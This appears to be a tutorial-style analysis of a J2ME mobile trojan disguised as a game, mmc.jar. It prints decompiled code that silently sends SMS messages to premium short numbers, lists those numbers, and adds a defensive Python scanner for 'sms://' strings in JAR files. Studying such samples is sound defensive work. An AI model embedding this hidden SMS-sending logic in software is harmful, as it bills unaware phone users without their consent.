Mobile Malware Analysis

Authors
  • Predrag TASEVSKI

PURPOSE

The goal of this post is to identify and analyze a mobile malware file, mmc.jar. Follow these steps to complete the task:

  • Unpack the file (hint: use zip on the .jar)
  • Examine the .class files using the tool available here (local copies for Mac, Linux and Win)
  • Find the code sending SMSes using the ‘sms://’ URI
  • Calculate the short number used in SM.send
  • Finally, compile the code using the Eclipse IDE development tool.

First, we analyze the Java source code after decompilation. The focus is on finding the code that sends SMSes using the ‘sms://’ URL. After identifying the associated classes, we have to compile the code to get to the final results, the URLs. For this purpose we use the Eclipse IDE development tool.

The results and the URLs the SMSes are sent to are presented in the conclusion section, which completes the task and yields a basic analysis of the mobile malware file.

ANALYSIS

After running the decompiler tool, we examine and analyze the Java source code. In the class M.class, at line 343, we found the following source code:

if ((i >= 35) && (SM.isSending != true) && (i % 6 == 0) && (f & count_query)) {
    if (SM.GS()) f += 1;
    if (f == 1) {
        RS.L(rs);
        RS.L("Slide");
        rs = RS.j("Slide");
        game = RS.L(rs, Integer.toString((int)(System.currentTimeMillis() / 1000L)));
        RS.L(rs);
    }
    if (f < count_query) {
        // destination is "sms://" plus ms[1][b], message text is ms[2][b]
        game = SM.send("sms://" + ms[1][b], ms[2][b]); // sms://
        if (b == count_query) b = 1; else b += 1;
    }
}

The above code is associated with the class SM.class, which contains the following source code:

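// Starts a new send unless one is already in progress.
public static int send(String s, String s1) {
    if (isSending) return 0;
    new SM(s, s1);
    return -1;
}

// s is the destination (the "sms://" URL), s1 is the message text.
public SM(String s, String s1) {
    success = false;
    isSending = true;
    this.destination = s;
    this.message = s1;
    try {
        Thread thread = new Thread(this); // run() of this object executes in a new thread
        thread.start();
    } catch (Exception exception) {
        isSending = false;
    }
}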

The above code checks whether the message and the destination are correct and whether the message is sent. The correlation is mostly with the first public static method, named send, which takes the two string values s and s1.

All of the above extraction was done with JD-GUI version 0.3.3 and JD-Core version 0.6.0, using the search function in the menu bar with criteria that meet our needs.
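The search for the ‘sms://’ string across the unpacked .class files can also be scripted. The following is an added example, not code from the original post or from the analyzed sample: it reads the constant pool of every class in a JAR and reports the classes that hold a matching string constant. The function names and the small test JAR are constructed for illustration.

```python
import io
import struct
import zipfile

MAGIC = b"\xca\xfe\xba\xbe"
# Payload bytes for each fixed-width constant-pool tag (JVM class-file format).
FIXED = {3: 4, 4: 4, 5: 8, 6: 8, 7: 2, 8: 2, 9: 4, 10: 4, 11: 4, 12: 4,
         15: 3, 16: 2, 17: 4, 18: 4, 19: 2, 20: 2}

def utf8_constants(cls):
    """Return the CONSTANT_Utf8 strings in one .class file's constant pool."""
    if cls[:4] != MAGIC:
        raise ValueError("not a Java class file")
    count = struct.unpack(">H", cls[8:10])[0]
    pos, idx, out = 10, 1, []
    while idx < count:
        tag, pos = cls[pos], pos + 1
        if tag == 1:                      # Utf8: u2 length, then the bytes
            n = struct.unpack(">H", cls[pos:pos + 2])[0]
            out.append(cls[pos + 2:pos + 2 + n].decode("utf-8", "replace"))
            pos += 2 + n
        else:
            pos += FIXED[tag]             # KeyError on an unknown tag
            idx += tag in (5, 6)          # Long/Double occupy two pool slots
        idx += 1
    return out

def find_uri(jar_bytes, needle="sms://"):
    """Map class name -> Utf8 constants containing needle, for each .class in a JAR."""
    hits = {}
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as jar:
        for name in (n for n in jar.namelist() if n.endswith(".class")):
            try:
                found = [s for s in utf8_constants(jar.read(name)) if needle in s]
            except (ValueError, KeyError, IndexError, struct.error):
                found = ["<unparseable class>"]   # flag for manual review
            if found:
                hits[name] = found
    return hits

def sample_jar():
    """Constructed test JAR: M.class holds an 'sms://' constant, A.class does not."""
    def cls(*strings):                    # Long first, to exercise the two-slot rule
        pool = b"".join(b"\x01" + struct.pack(">H", len(s)) + s for s in strings)
        return MAGIC + struct.pack(">HHH", 3, 45, len(strings) + 3) + b"\x05" + bytes(8) + pool
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("M.class", cls(b"sms://", b"Slide"))
        z.writestr("A.class", cls(b"Slide"))
    return buf.getvalue()
```

Only literal string constants are reported. Values assembled at run time, such as the short numbers appended from the ms table, still have to be recovered by reading or running the code.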

Below are the results of executing the code, produced by Eclipse after compiling it:

/0SIF|6XI8ULE|YNLD5QDA6WM|YJ90RL/+WPJDAFY2 DC3QJ/+3RKA/5YPA0MD-5QFD
while 7375/88600168904|7202/65510006691|1899/FTEME 1283|8385/88600168904|
1 16
2 33
3 49
4 66
7375 88600168904 //sms://7375
7202 65510006691 //sms://7202
1899 fteme 1283 //sms://1899
8385 88600168904 //sms://8385
decoded
36
7375 88600168904
42
7202 65510006691
48
1899 fteme 1283
54

From the results presented above, obtained after compiling the code, we have identified the number of SMS URLs and, in addition, the exact URLs.

CONCLUSION

We live in a world where mobile phones and smartphones are the most essential tools for everyday work and communication. We use them for communication, sending SMS, playing games, checking e-mail, social networking, bank transactions, etc. That is why there are hundreds of mobile malware files today, with more appearing every day. We need to be sure of what we are installing on our devices: what kind of games, applications, etc. This post will help people who are interested in learning the basics of how to analyze and identify malware files for mobile phones. However, it covers only the basics, and serves as a guide to the kinds of tools and applications you should have. The task here was done only for a mobile malware game with Java source code.

Furthermore, from the above section we have identified the number of SMSes that are sent and the numbers they are sent to. The total number of SMSes is 4, sent to the following URLs:

sms://7375
sms://7202
sms://1899
sms://8385

Finally, mobile malware is rising and is about to explode; therefore users need education [1]. By delivering basic and advanced mobile malware security awareness programs, we will have fewer malware attacks and better security policy in everyday mobile and smartphone usage.

Bibliography

[1] Chris Martin, Mobile malware is about to explode, users need education, 20 Jan. 2012.